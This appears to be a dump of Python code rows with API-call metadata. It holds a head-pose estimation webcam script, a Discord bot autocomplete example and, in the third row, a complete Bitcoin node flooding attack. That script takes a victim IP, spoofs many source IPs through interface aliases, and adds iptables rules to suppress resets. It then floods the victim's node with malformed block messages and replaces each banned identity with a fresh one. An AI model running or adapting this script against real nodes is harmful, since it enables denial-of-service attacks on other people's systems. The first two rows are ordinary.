| [((440, 457), 'mo_parsing.helpers.QuotedString', 'QuotedString', (['"""*"""'], {}), "('*')\n", (452, 457), False, 'from mo_parsing.helpers import QuotedString\n'), ((515, 533), 'mo_parsing.helpers.QuotedString', 'QuotedString', (['"""**"""'], {}), "('**')\n", (527, 533), False, 'from mo_parsing.helpers import QuotedString\n'), ((599, 618), 'mo_parsing.helpers.QuotedString', 'QuotedString', (['"""***"""'], {}), "('***')\n", (611, 618), False, 'from mo_parsing.helpers import QuotedString\n'), ((926, 965), 'mo_parsing.helpers.QuotedString', 'QuotedString', (['"""{{"""'], {'end_quote_char': '"""}}"""'}), "('{{', end_quote_char='}}')\n", (938, 965), False, 'from mo_parsing.helpers import QuotedString\n')] |
import os
import time
import cv2
import sys
sys.path.append('..')
import numpy as np
from math import cos, sin
from lib.FSANET_model import *
import numpy as np
from keras.layers import Average
def draw_axis(img, yaw, pitch, roll, tdx=None, tdy=None, size = 50):
print(yaw,roll,pitch)
pitch = pitch * np.pi / 180
yaw = -(yaw * np.pi / 180)
roll = roll * np.pi / 180
if tdx != None and tdy != None:
tdx = tdx
tdy = tdy
else:
height, width = img.shape[:2]
tdx = width / 2
tdy = height / 2
# X-Axis pointing to right. drawn in red
x1 = size * (cos(yaw) * cos(roll)) + tdx
y1 = size * (cos(pitch) * sin(roll) + cos(roll) * sin(pitch) * sin(yaw)) + tdy
# Y-Axis | drawn in green
# v
x2 = size * (-cos(yaw) * sin(roll)) + tdx
y2 = size * (cos(pitch) * cos(roll) - sin(pitch) * sin(yaw) * sin(roll)) + tdy
# Z-Axis (out of the screen) drawn in blue
x3 = size * (sin(yaw)) + tdx
y3 = size * (-cos(yaw) * sin(pitch)) + tdy
cv2.line(img, (int(tdx), int(tdy)), (int(x1),int(y1)),(0,0,255),3)
cv2.line(img, (int(tdx), int(tdy)), (int(x2),int(y2)),(0,255,0),3)
cv2.line(img, (int(tdx), int(tdy)), (int(x3),int(y3)),(255,0,0),2)
return img
def draw_results_ssd(detected,input_img,faces,ad,img_size,img_w,img_h,model):
# loop over the detections
if detected.shape[2]>0:
for i in range(0, detected.shape[2]):
# extract the confidence (i.e., probability) associated with the
# prediction
confidence = detected[0, 0, i, 2]
# filter out weak detections
if confidence > 0.5:
# compute the (x, y)-coordinates of the bounding box for
# the face and extract the face ROI
(h0, w0) = input_img.shape[:2]
box = detected[0, 0, i, 3:7] * np.array([w0, h0, w0, h0])
(startX, startY, endX, endY) = box.astype("int")
# print((startX, startY, endX, endY))
x1 = startX
y1 = startY
w = endX - startX
h = endY - startY
x2 = x1+w
y2 = y1+h
xw1 = max(int(x1 - ad * w), 0)
yw1 = max(int(y1 - ad * h), 0)
xw2 = min(int(x2 + ad * w), img_w - 1)
yw2 = min(int(y2 + ad * h), img_h - 1)
cv2.rectangle(input_img, (xw1,yw1), (xw2,yw2), (0, 0, 255), 2)
start=time.time()
faces[i,:,:,:] = cv2.resize(input_img[yw1:yw2 + 1, xw1:xw2 + 1, :], (img_size, img_size))
faces[i,:,:,:] = cv2.normalize(faces[i,:,:,:], None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX)
face = np.expand_dims(faces[i,:,:,:], axis=0)
p_result = model.predict(face)
print('fangxiang',time.time()-start)
face = face.squeeze()
img = draw_axis(input_img[yw1:yw2 + 1, xw1:xw2 + 1, :], p_result[0][0], p_result[0][1], p_result[0][2])
input_img[yw1:yw2 + 1, xw1:xw2 + 1, :] = img
return input_img
def main():
os.makedirs('./img',exist_ok=True)
img_size = 64
img_idx = 0
ad = 0.6
#Parameters
num_capsule = 3
dim_capsule = 16
routings = 2
stage_num = [3,3,3]
lambda_d = 1
num_classes = 3
image_size = 64
num_primcaps = 7*3
m_dim = 5
S_set = [num_capsule, dim_capsule, routings, num_primcaps, m_dim]
model1 = FSA_net_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)()
model2 = FSA_net_Var_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)()
num_primcaps = 8*8*3
S_set = [num_capsule, dim_capsule, routings, num_primcaps, m_dim]
model3 = FSA_net_noS_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)()
weight_file1 = '../pre-trained/300W_LP_models/fsanet_capsule_3_16_2_21_5/fsanet_capsule_3_16_2_21_5.h5'
model1.load_weights(weight_file1)
print('Finished loading model 1.')
weight_file2 = '../pre-trained/300W_LP_models/fsanet_var_capsule_3_16_2_21_5/fsanet_var_capsule_3_16_2_21_5.h5'
weight_file3 = '../pre-trained/300W_LP_models/fsanet_noS_capsule_3_16_2_192_5/fsanet_noS_capsule_3_16_2_192_5.h5'
model2.load_weights(weight_file2)
print('Finished loading model 2.')
model3.load_weights(weight_file3)
print('Finished loading model 3.')
inputs = Input(shape=(64,64,3))
x1 = model1(inputs) #1x1
x2 = model2(inputs) #var
x3 = model3(inputs) #w/o
avg_model = Average()([x1,x2,x3])
model = Model(inputs=inputs, outputs=avg_model)
# load our serialized face detector from disk
print("[INFO] loading face detector...")
protoPath = os.path.sep.join(["face_detector", "deploy.prototxt"])
modelPath = os.path.sep.join(["face_detector",
"res10_300x300_ssd_iter_140000.caffemodel"])
net = cv2.dnn.readNetFromCaffe(protoPath, modelPath)
# capture video
cap = cv2.VideoCapture(0)
# cap.set(cv2.CAP_PROP_FRAME_WIDTH, 1024*1)
# cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 768*1)
while True:
# get video frame
ret, input_img = cap.read()
img_idx = img_idx + 1
img_h, img_w, _ = np.shape(input_img)
blob = cv2.dnn.blobFromImage(cv2.resize(input_img, (300, 300)), 1.0,
(300, 300), (104.0, 177.0, 123.0))
net.setInput(blob)
detected = net.forward()
faces = np.empty((detected.shape[2], img_size, img_size, 3))
input_img = draw_results_ssd(detected,input_img,faces,ad,img_size,img_w,img_h,model)
# cv2.imwrite('img/'+str(img_idx)+'.png',input_img)
cv2.imshow("result", input_img)
key = cv2.waitKey(1)
if __name__ == '__main__':
main()
| [
"cv2.rectangle",
"cv2.resize",
"os.makedirs",
"cv2.normalize",
"cv2.dnn.readNetFromCaffe",
"cv2.imshow",
"math.cos",
"numpy.array",
"os.path.sep.join",
"cv2.waitKey",
"numpy.empty",
"cv2.VideoCapture",
"numpy.expand_dims",
"time.time",
"numpy.shape",
"math.sin",
"sys.path.append",
"keras.layers.Average"
]
| [((45, 66), 'sys.path.append', 'sys.path.append', (['""".."""'], {}), "('..')\n", (60, 66), False, 'import sys\n'), ((3243, 3278), 'os.makedirs', 'os.makedirs', (['"""./img"""'], {'exist_ok': '(True)'}), "('./img', exist_ok=True)\n", (3254, 3278), False, 'import os\n'), ((4861, 4915), 'os.path.sep.join', 'os.path.sep.join', (["['face_detector', 'deploy.prototxt']"], {}), "(['face_detector', 'deploy.prototxt'])\n", (4877, 4915), False, 'import os\n'), ((4932, 5011), 'os.path.sep.join', 'os.path.sep.join', (["['face_detector', 'res10_300x300_ssd_iter_140000.caffemodel']"], {}), "(['face_detector', 'res10_300x300_ssd_iter_140000.caffemodel'])\n", (4948, 5011), False, 'import os\n'), ((5030, 5076), 'cv2.dnn.readNetFromCaffe', 'cv2.dnn.readNetFromCaffe', (['protoPath', 'modelPath'], {}), '(protoPath, modelPath)\n', (5054, 5076), False, 'import cv2\n'), ((5108, 5127), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (5124, 5127), False, 'import cv2\n'), ((4675, 4684), 'keras.layers.Average', 'Average', ([], {}), '()\n', (4682, 4684), False, 'from keras.layers import Average\n'), ((5360, 5379), 'numpy.shape', 'np.shape', (['input_img'], {}), '(input_img)\n', (5368, 5379), True, 'import numpy as np\n'), ((5582, 5634), 'numpy.empty', 'np.empty', (['(detected.shape[2], img_size, img_size, 3)'], {}), '((detected.shape[2], img_size, img_size, 3))\n', (5590, 5634), True, 'import numpy as np\n'), ((5802, 5833), 'cv2.imshow', 'cv2.imshow', (['"""result"""', 'input_img'], {}), "('result', input_img)\n", (5812, 5833), False, 'import cv2\n'), ((5848, 5862), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (5859, 5862), False, 'import cv2\n'), ((970, 978), 'math.sin', 'sin', (['yaw'], {}), '(yaw)\n', (973, 978), False, 'from math import cos, sin\n'), ((5418, 5451), 'cv2.resize', 'cv2.resize', (['input_img', '(300, 300)'], {}), '(input_img, (300, 300))\n', (5428, 5451), False, 'import cv2\n'), ((619, 627), 'math.cos', 'cos', (['yaw'], {}), '(yaw)\n', (622, 627), False, 'from math import cos, sin\n'), ((630, 639), 'math.cos', 'cos', (['roll'], {}), '(roll)\n', (633, 639), False, 'from math import cos, sin\n'), ((805, 814), 'math.sin', 'sin', (['roll'], {}), '(roll)\n', (808, 814), False, 'from math import cos, sin\n'), ((1015, 1025), 'math.sin', 'sin', (['pitch'], {}), '(pitch)\n', (1018, 1025), False, 'from math import cos, sin\n'), ((2459, 2523), 'cv2.rectangle', 'cv2.rectangle', (['input_img', '(xw1, yw1)', '(xw2, yw2)', '(0, 0, 255)', '(2)'], {}), '(input_img, (xw1, yw1), (xw2, yw2), (0, 0, 255), 2)\n', (2472, 2523), False, 'import cv2\n'), ((2544, 2555), 'time.time', 'time.time', ([], {}), '()\n', (2553, 2555), False, 'import time\n'), ((2589, 2661), 'cv2.resize', 'cv2.resize', (['input_img[yw1:yw2 + 1, xw1:xw2 + 1, :]', '(img_size, img_size)'], {}), '(input_img[yw1:yw2 + 1, xw1:xw2 + 1, :], (img_size, img_size))\n', (2599, 2661), False, 'import cv2\n'), ((2695, 2784), 'cv2.normalize', 'cv2.normalize', (['faces[i, :, :, :]', 'None'], {'alpha': '(0)', 'beta': '(255)', 'norm_type': 'cv2.NORM_MINMAX'}), '(faces[i, :, :, :], None, alpha=0, beta=255, norm_type=cv2.\n NORM_MINMAX)\n', (2708, 2784), False, 'import cv2\n'), ((2825, 2866), 'numpy.expand_dims', 'np.expand_dims', (['faces[i, :, :, :]'], {'axis': '(0)'}), '(faces[i, :, :, :], axis=0)\n', (2839, 2866), True, 'import numpy as np\n'), ((664, 674), 'math.cos', 'cos', (['pitch'], {}), '(pitch)\n', (667, 674), False, 'from math import cos, sin\n'), ((677, 686), 'math.sin', 'sin', (['roll'], {}), '(roll)\n', (680, 686), False, 'from math import cos, sin\n'), ((714, 722), 'math.sin', 'sin', (['yaw'], {}), '(yaw)\n', (717, 722), False, 'from math import cos, sin\n'), ((794, 802), 'math.cos', 'cos', (['yaw'], {}), '(yaw)\n', (797, 802), False, 'from math import cos, sin\n'), ((839, 849), 'math.cos', 'cos', (['pitch'], {}), '(pitch)\n', (842, 849), False, 'from math import cos, sin\n'), ((852, 861), 'math.cos', 'cos', (['roll'], {}), '(roll)\n', (855, 861), False, 'from math import cos, sin\n'), ((888, 897), 'math.sin', 'sin', (['roll'], {}), '(roll)\n', (891, 897), False, 'from math import cos, sin\n'), ((1004, 1012), 'math.cos', 'cos', (['yaw'], {}), '(yaw)\n', (1007, 1012), False, 'from math import cos, sin\n'), ((1898, 1924), 'numpy.array', 'np.array', (['[w0, h0, w0, h0]'], {}), '([w0, h0, w0, h0])\n', (1906, 1924), True, 'import numpy as np\n'), ((689, 698), 'math.cos', 'cos', (['roll'], {}), '(roll)\n', (692, 698), False, 'from math import cos, sin\n'), ((701, 711), 'math.sin', 'sin', (['pitch'], {}), '(pitch)\n', (704, 711), False, 'from math import cos, sin\n'), ((864, 874), 'math.sin', 'sin', (['pitch'], {}), '(pitch)\n', (867, 874), False, 'from math import cos, sin\n'), ((877, 885), 'math.sin', 'sin', (['yaw'], {}), '(yaw)\n', (880, 885), False, 'from math import cos, sin\n'), ((2945, 2956), 'time.time', 'time.time', ([], {}), '()\n', (2954, 2956), False, 'import time\n')] |
import discord
from discord.commands import option
bot = discord.Bot(debug_guilds=[...])
COLORS = ["red", "orange", "yellow", "green", "blue", "indigo", "violet"]
LOTS_OF_COLORS = [
"aliceblue",
"antiquewhite",
"aqua",
"aquamarine",
"azure",
"beige",
"bisque",
"blueviolet",
"brown",
"burlywood",
"cadetblue",
"cornflowerblue",
"cornsilk",
"crimson",
"cyan",
"darkblue",
"deepskyblue",
"dimgray",
"dimgrey",
"dodgerblue",
"firebrick",
"floralwhite",
"forestgreen",
"fuchsia",
"gainsboro",
"ghostwhite",
"gold",
"goldenrod",
"gray",
"green",
"greenyellow",
"grey",
"honeydew",
"hotpink",
"indianred",
"indigo",
"ivory",
"khaki",
"lavender",
"lavenderblush",
"lawngreen",
"lightcoral",
"maroon",
"mediumaquamarine",
"mediumblue",
"mediumorchid",
"midnightblue",
"navajowhite",
"navy",
"oldlace",
"olive",
"olivedrab",
"orange",
"orangered",
"orchid",
"palegoldenrod",
"palegreen",
"plum",
"powderblue",
"purple",
"red",
"rosybrown",
"royalblue",
"saddlebrown",
"sienna",
"springgreen",
"steelblue",
"tan",
"teal",
"thistle",
"tomato",
"turquoise",
"violet",
"wheat",
"white",
"whitesmoke",
"yellow",
"yellowgreen",
]
BASIC_ALLOWED = [...] # This would normally be a list of discord user IDs for the purpose of this example
async def color_searcher(ctx: discord.AutocompleteContext):
"""
Returns a list of matching colors from the LOTS_OF_COLORS list.
In this example, we've added logic to only display any results in the
returned list if the user's ID exists in the BASIC_ALLOWED list.
This is to demonstrate passing a callback in the discord.utils.basic_autocomplete function.
"""
return [color for color in LOTS_OF_COLORS if ctx.interaction.user.id in BASIC_ALLOWED]
async def get_colors(ctx: discord.AutocompleteContext):
"""Returns a list of colors that begin with the characters entered so far."""
return [color for color in COLORS if color.startswith(ctx.value.lower())]
async def get_animals(ctx: discord.AutocompleteContext):
"""Returns a list of animals that are (mostly) the color selected for the "color" option."""
picked_color = ctx.options["color"]
if picked_color == "red":
return ["cardinal", "ladybug"]
elif picked_color == "orange":
return ["clownfish", "tiger"]
elif picked_color == "yellow":
return ["goldfinch", "banana slug"]
elif picked_color == "green":
return ["tree frog", "python"]
elif picked_color == "blue":
return ["blue jay", "blue whale"]
elif picked_color == "indigo":
return ["eastern indigo snake"] # Needs to return an iterable even if only one item
elif picked_color == "violet":
return ["purple emperor butterfly", "orchid dottyback"]
else:
return ["rainbowfish"]
@bot.slash_command(name="ac_example")
@option("color", description="Pick a color!", autocomplete=get_colors)
@option("animal", description="Pick an animal!", autocomplete=get_animals)
async def autocomplete_example(
ctx: discord.ApplicationContext,
color: str,
animal: str,
):
"""
Demonstrates using ctx.options to create options
that are dependent on the values of other options.
For the `color` option, a callback is passed, where additional
logic can be added to determine which values are returned.
For the `animal` option, the callback uses the input
from the color option to return an iterable of animals
"""
await ctx.respond(f"You picked {color} for the color, which allowed you to choose {animal} for the animal.")
@bot.slash_command(name="ac_basic_example")
@option(
"color",
description="Pick a color from this big list!",
autocomplete=discord.utils.basic_autocomplete(color_searcher),
# Demonstrates passing a callback to discord.utils.basic_autocomplete
)
@option(
"animal",
description="Pick an animal from this small list",
autocomplete=discord.utils.basic_autocomplete(["snail", "python", "cricket", "orca"]),
# Demonstrates passing a static iterable discord.utils.basic_autocomplete
)
async def autocomplete_basic_example(
ctx: discord.ApplicationContext,
color: str,
animal: str,
):
"""
This demonstrates using the discord.utils.basic_autocomplete helper function.
For the `color` option, a callback is passed, where additional
logic can be added to determine which values are returned.
For the `animal` option, a static iterable is passed.
While a small amount of values for `animal` are used in this example,
iterables of any length can be passed to discord.utils.basic_autocomplete
Note that the basic_autocomplete function itself will still only return a maximum of 25 items.
"""
await ctx.respond(f"You picked {color} as your color, and {animal} as your animal!")
bot.run("TOKEN")
| [
"discord.commands.option",
"discord.utils.basic_autocomplete",
"discord.Bot"
]
| [((58, 89), 'discord.Bot', 'discord.Bot', ([], {'debug_guilds': '[...]'}), '(debug_guilds=[...])\n', (69, 89), False, 'import discord\n'), ((3109, 3178), 'discord.commands.option', 'option', (['"""color"""'], {'description': '"""Pick a color!"""', 'autocomplete': 'get_colors'}), "('color', description='Pick a color!', autocomplete=get_colors)\n", (3115, 3178), False, 'from discord.commands import option\n'), ((3180, 3253), 'discord.commands.option', 'option', (['"""animal"""'], {'description': '"""Pick an animal!"""', 'autocomplete': 'get_animals'}), "('animal', description='Pick an animal!', autocomplete=get_animals)\n", (3186, 3253), False, 'from discord.commands import option\n'), ((3982, 4030), 'discord.utils.basic_autocomplete', 'discord.utils.basic_autocomplete', (['color_searcher'], {}), '(color_searcher)\n', (4014, 4030), False, 'import discord\n'), ((4203, 4275), 'discord.utils.basic_autocomplete', 'discord.utils.basic_autocomplete', (["['snail', 'python', 'cricket', 'orca']"], {}), "(['snail', 'python', 'cricket', 'orca'])\n", (4235, 4275), False, 'import discord\n')] |
from _thread import start_new_thread
from bitcoin.messages import *
from bitcoin.net import CAddress
from bitcoin.core import CBlock
from io import BytesIO as _BytesIO
import atexit
import bitcoin
import fcntl
import hashlib
import json
import os
import random
import re
import socket
import struct
import sys
import time
import datetime
if os.geteuid() != 0:
sys.exit("\nYou need to have root privileges to run this script.\nPlease try again, this time using 'sudo'. Exiting.\n")
# Specify the attacker's genuine IP
attacker_ip = input('\nEnter attacker\'s IP address: ')
# Specify the victim's IP, and port (8333 for Bitcoin)
victim_ip = input('Enter victim\'s IP address: ')
victim_port = 8333
# How many identities should run simultaneously
num_identities = 8
# While attacking the victim, wait this many seconds before sending each version message
seconds_between_version_packets = 0.1
identity_interface = [] # Keeps the IP alias interface and IP for each successful connection
identity_address = [] # Keeps the IP and port for each successful connection
identity_socket = [] # Keeps the socket for each successful connection
# The file where the iptables backup is saved, then restored when the script ends
iptables_file_path = f'{os.path.abspath(os.getcwd())}/backup.iptables.rules'
# Send commands to the Linux terminal
def terminal(cmd):
return os.popen(cmd).read()
# Send commands to the Bitcoin Core Console
def bitcoin(cmd):
return os.popen('./../../src/bitcoin-cli -rpcuser=cybersec -rpcpassword=<KEY>GW8kIuL1slRVFXoFpGsXXTIA55V3iUYLckn8rj8MZHBpmdGQjLxakotkj83ZlSRx1aOJ4BFxdvDNz0WHk1i2OPgXL4nsd56Ph991eKNbXVJHtzqCXUbtDELVf4shFJXame -rpcport=8332 ' + cmd).read()
# Generate a random identity using the broadcast address template
def random_ip():
# By forcing the IP to be above a certain threshhold, it prevents a lot of errors
minimum_ip_range = min(int(attacker_ip.split('.')[-1]), int(victim_ip.split('.')[-1])) + 1
while(True):
ip = broadcast_address
old_ip = ''
while(old_ip != ip):
old_ip = ip
ip = ip.replace('255', str(random.randint(minimum_ip_range, 255)), 1)
# Don't accept already assigned IPs
if ip == default_gateway: continue
if ip == victim_ip: continue
if ip not in [x[0] for x in identity_address]: break
return ip
#return f'10.0.{str(random.randint(0, 255))}.{str(random.randint(0, 255))}'
# Checking the internet by sending a single ping to Google
#def internet_is_active():
# return os.system('ping -c 1 google.com') == 0
# If all else fails, we can use this to recover the network
#def reset_network():
# print('Resetting network...')
# terminal(f'sudo ifconfig {network_interface} {attacker_ip} down')
# terminal(f'sudo ifconfig {network_interface} {attacker_ip} up')
# Create an alias for a specified identity
def ip_alias(ip_address):
global alias_num
print(f'Setting up IP alias {ip_address} on {network_interface}')
interface = f'{network_interface}:{alias_num}'
terminal(f'sudo ifconfig {interface} {ip_address} netmask 255.255.255.0 broadcast {broadcast_address} up')
alias_num += 1
return interface
# Construct a block packet using python-bitcoinlib
def block_packet_bytes():
hashPrevBlock = bytearray(random.getrandbits(8) for _ in range(32))
hashMerkleRoot = bytearray(random.getrandbits(8) for _ in range(32))
nTime = int((datetime.datetime.now() - datetime.datetime(1970, 1, 1)).total_seconds())#.to_bytes(8, 'little')
nNonce = random.getrandbits(32)
msg = CBlock(
nVersion=bitcoin_protocolversion,
hashPrevBlock=hashPrevBlock,
#hashPrevBlock='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
hashMerkleRoot=hashMerkleRoot,
#hashMerkleRoot='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
nTime=nTime,
nBits=0,
nNonce=nNonce,
vtx=()
)
name = 'block'
f = _BytesIO()
msg.stream_serialize(f)
body = f.getvalue()
res = b'\xf9\xbe\xb4\xd9'
res += name.encode()
res += b"\x00" * (12 - len(name))
res += struct.pack(b"<I", len(body))
#th = hashlib.sha256(body).digest() # add checksum
#h = hashlib.sha256(th).digest()
#res += h[:4]
res += bytearray(random.getrandbits(8) for _ in range(4))
res += body
return res
# Construct a version packet using python-bitcoinlib
def version_packet(src_ip, dst_ip, src_port, dst_port):
msg = msg_version(bitcoin_protocolversion)
msg.nVersion = bitcoin_protocolversion
msg.addrFrom.ip = src_ip
msg.addrFrom.port = src_port
msg.addrTo.ip = dst_ip
msg.addrTo.port = dst_port
# Default is /python-bitcoinlib:0.11.0/
msg.strSubVer = bitcoin_subversion.encode() # Look like a normal node
return msg
# Close a connection
def close_connection(socket, ip, port, interface):
socket.close()
terminal(f'sudo ifconfig {interface} {ip} down')
if socket in identity_socket: identity_socket.remove(socket)
else: del socket
if interface in identity_interface: identity_interface.remove(interface)
if (ip, port) in identity_address: identity_address.remove((ip, port))
print(f'Successfully closed connection to ({ip} : {port})')
# Creates a fake connection to the victim
def make_fake_connection(src_ip, dst_ip, verbose=True):
src_port = random.randint(1024, 65535)
dst_port = victim_port
print(f'Creating fake identity ({src_ip} : {src_port}) to connect to ({dst_ip} : {dst_port})...')
interface = ip_alias(src_ip)
identity_interface.append(interface)
if verbose: print(f'Successfully set up IP alias on interface {interface}')
if verbose: print('Resulting ifconfig interface:')
if verbose: print(terminal(f'ifconfig {interface}').rstrip() + '\n')
if verbose: print('Setting up iptables configurations')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL RST,ACK -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL FIN,ACK -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL FIN -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL RST -j DROP')
if verbose: print('Creating network socket...')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if verbose: print(f'Setting socket network interface to "{network_interface}"...')
success = s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, str(network_interface + '\0').encode('utf-8'))
while success == -1:
print(f'Setting socket network interface to "{network_interface}"...')
success = s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, str(network_interface + '\0').encode('utf-8'))
time.sleep(1)
print(network_interface)
if verbose: print(f'Binding socket to ({src_ip} : {src_port})...')
s.bind((src_ip, src_port))
if verbose: print(f'Connecting ({src_ip} : {src_port}) to ({dst_ip} : {dst_port})...')
try:
s.connect((dst_ip, dst_port))
except:
close_connection(s, src_ip, src_port, interface)
make_fake_connection(random_ip(), dst_ip, False)
return
# Send version packet
version = version_packet(src_ip, dst_ip, src_port, dst_port)
s.send(version.to_bytes())
# Get verack packet
verack = s.recv(1924)
# Send verack packet
verack = msg_verack(bitcoin_protocolversion)
s.send(verack.to_bytes())
# Get verack packet
verack = s.recv(1024)
if verbose: print('Connection successful!')
identity_address.append((src_ip, src_port))
identity_socket.append(s)
# Listen to the connections for future packets
if verbose: print('Attaching attacker script {interface}')
try:
start_new_thread(attack, (), {
'socket': s,
'src_ip': src_ip,
'src_port': src_port,
'dst_ip': dst_ip,
'dst_port': dst_port,
'interface': interface
})
except:
print('Error: unable to start thread to sniff interface {interface}')
# Send version repeatedly, until banned
def attack(socket, src_ip, src_port, dst_ip, dst_port, interface):
block = block_packet_bytes()
while True:
if seconds_between_version_packets != 0:
time.sleep(seconds_between_version_packets)
try:
socket.send(block)
except Exception as e:
print(e)
break
close_connection(socket, src_ip, src_port, interface)
print(f'Peer was banned ({src_ip} : {src_port})')
make_fake_connection(random_ip(), dst_ip, False)
# Initialize the network
def initialize_network_info():
print('Retrieving network info...')
global default_gateway, network_interface, broadcast_address
# Get the network interface of the default gateway
m = re.search(r'default +via +([^ ]+) +dev +([^ ]+)', terminal('ip route'))
if m != None:
default_gateway = m.group(1).strip()
network_interface = m.group(2).strip()
else:
print('Error: Network interface couldn\'t be found.')
sys.exit()
# Get the broadcast address of the network interface
# Used as an IP template of what can change, so that packets still come back to the sender
m = re.search(r'broadcast ([^ ]+)', terminal(f'ifconfig {network_interface}'))
if m != None:
broadcast_address = m.group(1).strip()
else:
print('Error: Network broadcast IP couldn\'t be found.')
sys.exit()
# Initialize Bitcoin info
def initialize_bitcoin_info():
print('Retrieving bitcoin info...')
global bitcoin_subversion
global bitcoin_protocolversion
bitcoin_subversion = '/Satoshi:0.18.0/'
bitcoin_protocolversion = 70015
try:
network_info = None #json.loads(bitcoin('getnetworkinfo'))
if 'subversion' in network_info:
bitcoin_subversion = network_info['subversion']
if 'protocolversion' in network_info:
bitcoin_protocolversion = network_info['protocolversion']
except:
pass
# Save a backyp of the iptable rules
def backup_iptables():
terminal(f'iptables-save > {iptables_file_path}')
# Restore the backup of the iptable rules
def cleanup_iptables():
if(os.path.exists(iptables_file_path)):
print('Cleaning up iptables configuration')
terminal(f'iptables-restore < {iptables_file_path}')
os.remove(iptables_file_path)
# Remove all ip aliases that were created by the script
def cleanup_ipaliases():
for i in range(0, len(identity_address)):
try:
ip = identity_address[i][0]
interface = identity_interface[i]
print(f'Cleaning up IP alias {ip} on {interface}')
terminal(f'sudo ifconfig {interface} {ip} down')
except: pass
# This function is ran when the script is stopped
def on_close():
print('Closing open sockets')
for socket in identity_socket:
socket.close()
cleanup_ipaliases()
cleanup_iptables()
print('Cleanup complete. Goodbye.')
#print('Verifying that internet works...')
#if not internet_is_active():
# reset_network()
# This is the first code to run
if __name__ == '__main__':
global alias_num
alias_num = 0 # Increments each alias
initialize_network_info()
initialize_bitcoin_info()
atexit.register(on_close) # Make on_close() run when the script terminates
cleanup_iptables() # Restore any pre-existing iptables before backing up, just in case if the computer shutdown without restoring
backup_iptables()
# Create the connections
for i in range(1, num_identities + 1):
try:
make_fake_connection(src_ip = random_ip(), dst_ip = victim_ip)
except ConnectionRefusedError:
print('Connection was refused. The victim\'s node must not be running.')
print(f'Successful connections: {len(identity_address)}\n')
# Prevent the script from terminating when the sniff function is still active
while 1:
time.sleep(60)
| [
"datetime.datetime",
"os.path.exists",
"socket.send",
"bitcoin.core.CBlock",
"socket.socket",
"atexit.register",
"io.BytesIO",
"os.geteuid",
"time.sleep",
"os.getcwd",
"datetime.datetime.now",
"os.popen",
"random.getrandbits",
"socket.close",
"sys.exit",
"random.randint",
"_thread.start_new_thread",
"os.remove"
]
| [((342, 354), 'os.geteuid', 'os.geteuid', ([], {}), '()\n', (352, 354), False, 'import os\n'), ((362, 493), 'sys.exit', 'sys.exit', (['"""\nYou need to have root privileges to run this script.\nPlease try again, this time using \'sudo\'. Exiting.\n"""'], {}), '(\n """\nYou need to have root privileges to run this script.\nPlease try again, this time using \'sudo\'. Exiting.\n"""\n )\n', (370, 493), False, 'import sys\n'), ((3435, 3457), 'random.getrandbits', 'random.getrandbits', (['(32)'], {}), '(32)\n', (3453, 3457), False, 'import random\n'), ((3465, 3614), 'bitcoin.core.CBlock', 'CBlock', ([], {'nVersion': 'bitcoin_protocolversion', 'hashPrevBlock': 'hashPrevBlock', 'hashMerkleRoot': 'hashMerkleRoot', 'nTime': 'nTime', 'nBits': '(0)', 'nNonce': 'nNonce', 'vtx': '()'}), '(nVersion=bitcoin_protocolversion, hashPrevBlock=hashPrevBlock,\n hashMerkleRoot=hashMerkleRoot, nTime=nTime, nBits=0, nNonce=nNonce, vtx=())\n', (3471, 3614), False, 'from bitcoin.core import CBlock\n'), ((3948, 3958), 'io.BytesIO', '_BytesIO', ([], {}), '()\n', (3956, 3958), True, 'from io import BytesIO as _BytesIO\n'), ((4812, 4826), 'socket.close', 'socket.close', ([], {}), '()\n', (4824, 4826), False, 'import socket\n'), ((5276, 5303), 'random.randint', 'random.randint', (['(1024)', '(65535)'], {}), '(1024, 65535)\n', (5290, 5303), False, 'import random\n'), ((6168, 6217), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (6181, 6217), False, 'import socket\n'), ((9772, 9806), 'os.path.exists', 'os.path.exists', (['iptables_file_path'], {}), '(iptables_file_path)\n', (9786, 9806), False, 'import os\n'), ((10758, 10783), 'atexit.register', 'atexit.register', (['on_close'], {}), '(on_close)\n', (10773, 10783), False, 'import atexit\n'), ((6629, 6642), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (6639, 6642), False, 'import time\n'), ((7548, 7699), '_thread.start_new_thread', 'start_new_thread', (['attack', '()', "{'socket': s, 'src_ip': src_ip, 'src_port': src_port, 'dst_ip': dst_ip,\n 'dst_port': dst_port, 'interface': interface}"], {}), "(attack, (), {'socket': s, 'src_ip': src_ip, 'src_port':\n src_port, 'dst_ip': dst_ip, 'dst_port': dst_port, 'interface': interface})\n", (7564, 7699), False, 'from _thread import start_new_thread\n'), ((8718, 8728), 'sys.exit', 'sys.exit', ([], {}), '()\n', (8726, 8728), False, 'import sys\n'), ((9080, 9090), 'sys.exit', 'sys.exit', ([], {}), '()\n', (9088, 9090), False, 'import sys\n'), ((9912, 9941), 'os.remove', 'os.remove', (['iptables_file_path'], {}), '(iptables_file_path)\n', (9921, 9941), False, 'import os\n'), ((10395, 10409), 'socket.close', 'socket.close', ([], {}), '()\n', (10407, 10409), False, 'import socket\n'), ((11386, 11400), 'time.sleep', 'time.sleep', (['(60)'], {}), '(60)\n', (11396, 11400), 